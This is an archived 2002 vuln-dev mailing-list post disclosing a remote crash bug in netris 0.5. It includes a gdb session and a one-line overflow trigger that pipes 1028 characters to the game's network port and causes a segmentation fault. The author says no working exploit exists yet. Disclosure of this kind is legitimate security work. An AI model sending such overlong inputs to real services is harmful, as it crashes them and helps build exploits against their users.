netris-0.5.
From: Artur Byszko / bajkero (bajkero@security.hack.pl)Date: 09/09/02
- Previous message: Fernando J. Pando: "Re: x509 cert parsing in web browsers"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 9 Sep 2002 06:55:38 +0200 From: Artur Byszko / bajkero <bajkero@security.hack.pl> To: vuln-dev@securityfocus.com
hi.
i found remote bug in latest version of netris(0.5)..
(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...
***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***
Your opponent is using an old, incompatible version
of Netris. They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4
exploit code is still under developing.. ;)
sorry for my terrible english.
best regards,
-- * Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *
- application/pgp-signature attachment: stored
- Previous message: Fernando J. Pando: "Re: x509 cert parsing in web browsers"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
